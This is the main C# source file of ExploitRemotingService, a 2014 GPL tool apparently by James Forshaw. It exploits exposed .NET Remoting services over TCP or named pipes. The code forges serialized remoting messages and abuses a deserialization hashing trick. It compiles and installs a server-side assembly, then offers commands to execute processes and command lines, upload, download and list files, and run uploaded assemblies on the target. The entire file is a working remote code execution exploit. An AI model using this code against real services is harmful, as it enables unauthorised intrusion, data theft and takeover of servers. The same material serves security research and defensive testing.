﻿//    ExploitRemotingService
//    Copyright (C) 2014 James Forshaw
//
//    This program is free software: you can redistribute it and/or modify
//    it under the terms of the GNU General Public License as published by
//    the Free Software Foundation, either version 3 of the License, or
//    (at your option) any later version.
//
//    This program is distributed in the hope that it will be useful,
//    but WITHOUT ANY WARRANTY; without even the implied warranty of
//    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
//    GNU General Public License for more details.
//
//    You should have received a copy of the GNU General Public License
//    along with this program.  If not, see <http://www.gnu.org/licenses/>.

using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Diagnostics;
using System.IO;
using System.IO.Pipes;
using System.Linq;
using System.Net;
using System.Net.Security;
using System.Net.Sockets;
using System.Reflection;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Ipc;
using System.Runtime.Remoting.Channels.Tcp;
using System.Runtime.Remoting.Messaging;
using System.Runtime.Serialization.Formatters;
using System.Runtime.Serialization.Formatters.Binary;
using System.Security.Principal;
using System.Text;
using FakeAsm;
using Microsoft.CSharp;
using NDesk.Options;

namespace ExploitRemotingService
{
    class Program
    {
        private static Uri _uri;
        private static int _port;
        private static string _cmd;
        private static List<string> _cmdargs;
        private static string _username;
        private static string _password;
        private static string _domain;
        private static string _ipcname;        
        private static bool _secure;
        private static int _ver;
        private static string _remotename;
        private static bool _usecom;
        private static bool _useser;
        
        static void SetupServer()
        {
            // We don't need anything if using COM as we're in a MTA unless we are also secure
            if (!_usecom || _secure)
            {
                IDictionary props = new Hashtable();
                props["includeVersions"] = false;

                BinaryServerFormatterSinkProvider serverProvider = new BinaryServerFormatterSinkProvider(props, null);
                BinaryClientFormatterSinkProvider clientProvider = new BinaryClientFormatterSinkProvider(props, null);
                IDictionary dict = new Hashtable();

                serverProvider.TypeFilterLevel = TypeFilterLevel.Full;

                IChannel channel;

                switch (_uri.Scheme)
                {
                    case "tcp":
                        {
                            dict["port"] = _port;
                            channel = new TcpChannel(dict, clientProvider, serverProvider);
                        }
                        break;
                    case "ipc":
                        dict["name"] = "ipc";
                        dict["priority"] = "20";
                        dict["portName"] = _ipcname;
                        dict["secure"] = _secure;
                        channel = new IpcChannel(dict, clientProvider, serverProvider);                        
                        break;
                    default:
                        throw new InvalidOperationException(String.Format("Unknown URI scheme {0}", _uri.Scheme));
                }

                ChannelServices.RegisterChannel(channel, _secure);    //register channel
            }
        }

        private static Stream BindStream()
        {
            Stream ret = null;

            if (_uri.Scheme == "tcp")
            {
                TcpClient client = new TcpClient();

                client.Connect(_uri.Host, _uri.Port);

                ret = client.GetStream();

                if (_secure)
                {
                    NegotiateStream stm = new NegotiateStream(ret);
                    NetworkCredential cred = _username == null ? CredentialCache.DefaultNetworkCredentials : new NetworkCredential(_username, _password, _domain);

                    stm.AuthenticateAsClient(cred, String.Empty, ProtectionLevel.EncryptAndSign, TokenImpersonationLevel.Impersonation);

                    ret = stm;
                }
            }
            else if (_uri.Scheme == "ipc")
            {                
                NamedPipeClientStream stm = new NamedPipeClientStream(".", _uri.Host, PipeDirection.InOut, PipeOptions.None, 
                    TokenImpersonationLevel.Impersonation, HandleInheritability.None);                

                stm.Connect();

                ret = stm;
            }
            
            if (ret == null)
            {
                throw new InvalidOperationException("Could not bind stream");
            }
            
            return ret;
        }

        private static bool ProcessArgs(string[] args)
        {
            
            bool debug = false;
            bool showhelp = false;
            _port = 11111;
            _ipcname = "remotingexploit";            
            _remotename = Guid.Empty.ToString();
            _ver = 0;

            OptionSet p = new OptionSet () {
   	            { "s|secure", "Enable secure mode", v => _secure = v != null },   	 
                { "p|port=", "Specify the local TCP port to listen on", v => _port = int.Parse(v) },                
                { "i|ipc=", "Specify listening pipe name for IPC channel", v => _ipcname = v },
                { "user=", "Specify username for secure mode", v => {
                    _username = v;
                    if (_username.Contains('\\'))
                    {
                        string[] ss = _username.Split('\\');
                        _domain = ss[0];
                        _username = ss[1];
                    }
                }},
                { "pass=", "Specify password for secure mode", v => _password = v },
                { "ver=", "Specify version number for remote, 2 or 4", v => _ver = int.Parse(v) },
                { "usecom", "Use DCOM backchannel instead of .NET remoting", v => _usecom = v != null },
                { "remname=", "Specify the remote object name to register", v => _remotename = v },
                { "v|verbose", "Enable verbose debug output", v => debug = v != null },
                { "useser", "Uses old serialization tricks, only works on full type filter services", 
                    v => _useser = v != null },
   	            { "h|?|help",   v => showhelp = v != null },
                };

            try
            {
                List<string> argsleft = p.Parse(args);

                if (debug)
                { 
                    Trace.Listeners.Add(new ConsoleTraceListener(true));
                }

                if (argsleft.Count < 2)
                {
                    throw new InvalidOperationException("Must specify a URI and command"); 
                }

                _uri = new Uri(argsleft[0], UriKind.Absolute);
                _cmd = argsleft[1];
                _cmdargs = argsleft;
                _cmdargs.RemoveRange(0, 2);
            }
            catch(Exception ex)
            {
                Console.WriteLine(ex.Message);
                showhelp = true;
            }            

            if(showhelp)
            {
                PrintHelp(p);
                return false;
            }

            return true;
        }

        static void PrintHelp(OptionSet p)
        {
            Console.WriteLine(@"ExploitRemotingService [options] uri command [command args]
Copyright (c) James Forshaw 2014

Uri:
The supported URI are as follows:
tcp://host:port/ObjName   - TCP connection on host and portname
ipc://channel/ObjName     - Named pipe channel

Options:
");

            p.WriteOptionDescriptions(Console.Out);

            Console.WriteLine(@"
Commands:
exec [-wait] program [cmdline]: Execute a process on the hosting server
cmd  cmdline                  : Execute a command line process and display stdout
put  localfile remotefile     : Upload a file to the hosting server
get  remotefile localfile     : Download a file from the hosting server
ls   remotedir                : List a remote directory
run  file [args]              : Upload and execute an assembly, calls entry point
user                          : Print the current username
ver                           : Print the OS version
");
        }

        private static byte[] SerializeObject(object o, bool remote)
        {
            MemoryStream stm = new MemoryStream();
            BinaryFormatter fmt = new BinaryFormatter();

            fmt.AssemblyFormat = FormatterAssemblyStyle.Simple;

            if (remote)
            {
                fmt.SurrogateSelector = new RemotingSurrogateSelector();
            }  
            
            fmt.Serialize(stm, o);

            return stm.ToArray();
        }

        private static string ReadHeaderString(BinaryReader reader)
        {
            int encType = reader.ReadByte();
            int length = reader.ReadInt32();

            byte[] data = reader.ReadBytes(length);

            if(encType == 0)
            {
                return Encoding.Unicode.GetString(data);
            }
            else if(encType == 1)
            {
                return Encoding.UTF8.GetString(data);
            }
            else
            {
                throw new InvalidOperationException("Invalid string encoding");
            }
        }

        private static void ReadHeaders(BinaryReader reader)
        {
            ushort token = reader.ReadUInt16();

            while (token != 0)
            {
                string name = token.ToString();
                object value = null;

                switch (token)
                {
                    case 1:
                        {
                            name = ReadHeaderString(reader);
                            value = ReadHeaderString(reader);
                        }
                        break;
                    default:
                        byte dataType = reader.ReadByte();
                        
                        switch (dataType)
                        {
                            case 0:
                                break;
                            case 1:
                                value = ReadHeaderString(reader);
                                break;
                            case 2:
                                value = reader.ReadByte();
                                break;
                            case 3:
                                value = reader.ReadUInt16();
                                break;
                            case 4:
                                value = reader.ReadInt32();
                                break;
                            default:
                                throw new InvalidOperationException("Unknown header data type");
                        }
                        break;
                }

                Trace.WriteLine(String.Format("Header: {0}={1}", name, value));
                token = reader.ReadUInt16();
            }
        }

        private static object ParseResult(BinaryReader reader)
        {
            uint magic = reader.ReadUInt32();

            if (magic != 0x54454E2E)
            {
                throw new InvalidDataException("Invalid magic value");
            }

            reader.ReadByte(); // Major
            reader.ReadByte(); // Minor
            reader.ReadUInt16(); // Operation Type
            reader.ReadUInt16(); // Content distribution

            int len = reader.ReadInt32();

            ReadHeaders(reader);

            byte[] data = reader.ReadBytes(len);

            BinaryFormatter fmt = new BinaryFormatter();

            fmt.AssemblyFormat = FormatterAssemblyStyle.Simple;
            
            MemoryStream stm = new MemoryStream(data);

            IMethodReturnMessage ret = fmt.Deserialize(stm) as IMethodReturnMessage;

            if (ret != null)
            {
                if (ret.Exception != null)
                {
                    return ret.Exception;
                }
                else
                {
                    return ret.ReturnValue ?? "void";
                }
            }
            else
            {
                return "Error";
            }
        }

        private static MethodBase GetStaticMethod(Type type, string name, params Type[] argTypes)
        {
            MethodBase b = type.GetMethod(name, BindingFlags.Static | BindingFlags.Public, null, argTypes, null);

            if(b == null)
            {
                throw new InvalidOperationException(String.Format("Could not get method {0} with types {1}", name, String.Join(",", argTypes.Select(t => t.FullName).ToArray())));
            }

            return b;
        }

        private static MethodBase GetCreateInstance<T>()
        {
            return new FakeMethod(typeof(Activator).GetMethod("CreateInstance", new Type[0]).MakeGenericMethod(typeof(T)), _ver);
        }

        private static IRemoteClass GetExistingRemoteClass()
        {
            Uri u = new Uri(_uri, "/" + _remotename);

            return (IRemoteClass)Activator.GetObject(typeof(IRemoteClass), u.ToString());
        }

        private static string GetResource(string name)
        {            
            using (Stream stm = typeof(Program).Assembly.GetManifestResourceStream("ExploitRemotingService." + name))
            {
                if (stm != null)
                {
                    StreamReader reader = new StreamReader(stm);

                    return reader.ReadToEnd();
                }
            }

            return null;
        }

        private class SerializerRemoteClass : MarshalByRefObject, IRemoteClass, IEqualityComparer
        {
            private static FileSystemInfo GetFileInfo(string path, bool directory)
            {
                FileSystemInfo info;

                if (directory)
                {
                    info = new DirectoryInfo(".");
                }
                else
                {
                    info = new FileInfo(".");
                }

                FieldInfo fi = typeof(FileSystemInfo).GetField("FullPath", System.Reflection.BindingFlags.Instance | System.Reflection.BindingFlags.NonPublic);

                fi.SetValue(info, path);

                return info;
            }

            private void SendRequestToServer(object retobj)
            {                
                Hashtable hash = new Hashtable(this);

                hash.Add(retobj, "a");
                hash.Add("Dummy", "a");

                Trace.WriteLine(SendRequest(hash, true).ToString());
            }

            public Process RunProcess(string process, string args)
            {
                throw new NotImplementedException();
            }

            public string RunCommand(string cmd)
            {
                throw new NotImplementedException();
            }

            public int ExecuteAssembly(byte[] asm, string[] args)
            {
                throw new NotImplementedException();
            }

            public DirectoryInfo GetDirectory(string path)
            {
                SendRequestToServer(GetFileInfo(path, true));

                return (DirectoryInfo)_capturedobj;
            }

            public void WriteFile(string path, byte[] contents)
            {
                SendRequestToServer(GetFileInfo(path, false));

                FileInfo obj = _capturedobj as FileInfo;
                if (obj != null)
                {
                    using (FileStream stm = obj.Open(FileMode.Create, FileAccess.ReadWrite))
                    {
                        stm.Write(contents, 0, contents.Length);
                    }
                }                
            }

            public byte[] ReadFile(string path)
            {
                SendRequestToServer(GetFileInfo(path, false));

                FileInfo obj = _capturedobj as FileInfo;
                if (obj != null)
                {
                    using (FileStream stm = obj.OpenRead())
                    {
                        List<byte> data = new List<byte>();
                        byte[] buf = new byte[1024];

                        int len = stm.Read(buf, 0, buf.Length);
                        while(len > 0)
                        {
                            data.AddRange(buf.Take(len));

                            len = stm.Read(buf, 0, buf.Length);
                        }

                        return data.ToArray();
                    }
                }

                return new byte[0];
            }

            public string GetUsername()
            {
                throw new NotImplementedException();
            }

            public OperatingSystem GetOSVersion()
            {
                throw new NotImplementedException();
            }

            private object _capturedobj;

            bool IEqualityComparer.Equals(object x, object y)
            {
                return x.Equals(y);
            }

            int IEqualityComparer.GetHashCode(object obj)
            {              
                if (obj is string)
                {
                    return obj.GetHashCode();
                }
                else
                {
                    _capturedobj = obj;
                    return 1;
                }                
            }
        }

        private static IRemoteClass CreateRemoteClass()
        {
            if (_useser)
            {
                return new SerializerRemoteClass();
            }
            else
            {
                string path;

                if (_uri.Scheme != "ipc")
                {
                    IRemoteClass ret = GetExistingRemoteClass();

                    try
                    {
                        ret.ToString();

                        return ret;
                    }
                    catch (RemotingException)
                    {
                    }

                    path = MakeCall<string>(_uri.AbsolutePath, GetStaticMethod(typeof(Path), "GetTempPath"));

                    path = Path.Combine(path, "Installer.dll");

                    CodeDomProvider compiler = MakeCall<CodeDomProvider>(_uri.AbsolutePath, GetCreateInstance<CSharpCodeProvider>());

                    string uri = RemotingServices.GetObjectUri(compiler);

                    CompilerParameters cp = new CompilerParameters();

                    cp.ReferencedAssemblies.Add("System.dll");
                    cp.ReferencedAssemblies.Add("System.Configuration.Install.dll");
                    cp.OutputAssembly = path;

                    cp.GenerateInMemory = false;
                    cp.GenerateExecutable = false;

                    string code = GetResource("RemoteClass.cs");
                    string intf = GetResource("IRemoteClass.cs");
                    string inst = GetResource("InstallClass.cs");

                    CompilerResults res = MakeCall<CompilerResults>(uri,
                            new FakeMethod(typeof(CodeDomProvider).GetMethod("CompileAssemblyFromSource"), _ver),
                            cp, new string[] { code, intf, inst });
                }
                else
                {
                    path = typeof(IRemoteClass).Assembly.Location;
                }

                try
                {
                    AssemblyInstaller installer = MakeCall<AssemblyInstaller>(_uri.AbsolutePath, GetCreateInstance<AssemblyInstaller>());

                    installer.Path = path;
                    installer.CommandLine = new string[] { "/name=" + _remotename };
                    installer.UseNewContext = true;

                    installer.Install(new Hashtable());
                }
                catch
                {
                    // In the IPC case this might fail
                    // Just continue on with the creation of the remote class and see if we're lucky                
                }

                return GetExistingRemoteClass();
            }
        }

        static object SendRequest(object o, bool remote)
        {
            byte[] data = SerializeObject(o, remote);
            MemoryStream stm = new MemoryStream();
            BinaryWriter writer = new BinaryWriter(stm);

            writer.Write((uint)0x54454E2E); // Header            
            writer.Write((byte)1); // Major
            writer.Write((byte)0); // Minor
            writer.Write((ushort)0); // OperationType
            writer.Write((ushort)0); // ContentDistribution
            writer.Write(data.Length); // Data Length

            writer.Write((ushort)4); // UriHeader
            writer.Write((byte)1); // DataType
            writer.Write((byte)1); // Encoding: UTF8

            byte[] uriData = Encoding.UTF8.GetBytes(_uri.ToString());

            writer.Write(uriData.Length); // Length
            writer.Write(uriData); // URI

            writer.Write((ushort)0); // Terminating Header
            writer.Write(data); // Data

            using (Stream netStream = BindStream())
            {
                using (BinaryWriter netWriter = new BinaryWriter(netStream))
                {
                    netWriter.Write(stm.ToArray());

                    BinaryReader reader = new BinaryReader(netStream);

                    return ParseResult(reader);
                }
            } 
        }

        public static T MakeCall<T>(string path, MethodBase mi, params object[] cmdargs)
        {
            return (T)MakeCall(path, mi, cmdargs);
        }

        private static object GetMessageObject(string path, MethodBase method, object[] args)
        {
            FakeMessage msg = new FakeMessage(path, method, args);

            if (_usecom)
            {                
                return new FakeComObjRef(msg);
            }
            else
            {                
                return RemotingServices.Marshal(msg);
            }
        }

        public static object MakeCall(string path, MethodBase mi, params object[] cmdargs)
        {
            object ret = SendRequest(GetMessageObject(path, mi, cmdargs), false);

            if (ret is Exception)
            {
                throw (Exception)ret;
            }
            else
            {
                return ret;
            }
        }

        public static MethodBase GetProperty(Type t, string name)
        {
            MethodBase b = t.GetProperty(name).GetGetMethod();

            if (b == null)
            {
                throw new ArgumentException("Invalid property name");
            }

            return b;
        }

        static int DetectMajorVersion()
        {
            Version ver = null;

            if (!_useser)
            {
                try
                {
                    ver = MakeCall<Version>(_uri.AbsolutePath, GetProperty(typeof(Environment), "Version"));
                }
                catch
                {

                }
            }

            if (ver == null)
            {
                ver = Environment.Version;
                Console.WriteLine("Error, couldn't detect version, using host: {0}", ver);
            }

            return ver.Major;
        }

        private static void ExecuteCommand(IRemoteClass c)
        {                                   
            switch (_cmd)
            {
                case "exec":
                    {
                        bool wait = false;

                        if (_cmdargs.Count > 0)
                        {
                            if(_cmdargs[0].Equals("-wait", StringComparison.OrdinalIgnoreCase))
                            {
                                wait = true;                                
                                _cmdargs.RemoveAt(0);
                            }
                        }

                        if ((_cmdargs.Count == 0) || (_cmdargs.Count > 2))
                        {
                            Console.Error.WriteLine("Must specify at least 1 or two options for exec command");
                        }
                        else
                        {
                            string cmd = _cmdargs[0];
                            string cmdline = _cmdargs.Count > 1 ? _cmdargs[1] : String.Empty;

                            Process p = c.RunProcess(cmd, cmdline);

                            Console.WriteLine("Received new process id {0}", p.Id);

                            if (wait)
                            {
                                p.WaitForExit();
                            }
                        }
                    }
                    break;
                case "cmd":
                    if (_cmdargs.Count != 1)
                    {
                        Console.Error.WriteLine("Must specify 1 argument for cmd command");
                    }
                    else
                    {
                        string ret = c.RunCommand(_cmdargs[0]);

                        Console.WriteLine(ret);
                    }
                    break;
                case "ls":
                    if (_cmdargs.Count != 1)
                    {
                        Console.Error.WriteLine("Must specify 1 argument for ls command");
                    }
                    else
                    {
                        DirectoryInfo dir = c.GetDirectory(_cmdargs[0]);

                        Console.WriteLine("Listing {0} directory", dir.FullName);

                        foreach (DirectoryInfo d in dir.GetDirectories())
                        {
                            Console.WriteLine("<DIR> {0}", d.Name);
                        }

                        foreach (FileInfo f in dir.GetFiles())
                        {
                            Console.WriteLine("{0} - Length {1}", f.Name, f.Length);
                        }
                    }

                    break;
                case "put":
                    if (_cmdargs.Count != 2)
                    {
                        Console.Error.WriteLine("Must specify localfile and remotefile argument");
                    }
                    else
                    {
                        byte[] data = File.ReadAllBytes(_cmdargs[0]);

                        c.WriteFile(_cmdargs[1].ToString(), data);
                    }

                    break;
                case "get":
                    if (_cmdargs.Count != 2)
                    {
                        Console.Error.WriteLine("Must specify localfile and remotefile argument");
                    }
                    else
                    {
                        byte[] data = c.ReadFile(_cmdargs[0]);

                        File.WriteAllBytes(_cmdargs[1], data);
                    }
                    break;
                case "run":
                    if (_cmdargs.Count < 1)
                    {
                        Console.Error.WriteLine("Must specify an assembly file to upload");
                    }
                    else
                    {
                        byte[] asm = File.ReadAllBytes(_cmdargs[0]);

                        string[] args = _cmdargs.Skip(1).ToArray();                        

                        Console.WriteLine("Result: {0}", c.ExecuteAssembly(asm, args));
                    }

                    break;
                case "user":
                    Console.WriteLine("User: {0}", c.GetUsername());
                    break;
                case "osver":
                    Console.WriteLine("OS: {0}", c.GetOSVersion());
                    break;
                default:
                    Console.Error.WriteLine(String.Format("Unknown command {0}", _cmd));
                    break;
            }
        }

        [MTAThread]
        static int Main(string[] args)
        {
            if (ProcessArgs(args))
            {
                try
                {
                    SetupServer();

                    if (_ver == 0)
                    {
                        _ver = DetectMajorVersion();

                        Console.WriteLine("Detected version {0} server", _ver);
                    }

                    IRemoteClass ret = CreateRemoteClass();

                    ExecuteCommand(ret);
                }
                catch (Exception ex)
                {
                    Console.WriteLine(ex);
                    return 1;
                }
                return 0;
            }
            else
            {
                return 1;
            }            
        }      
    }
}
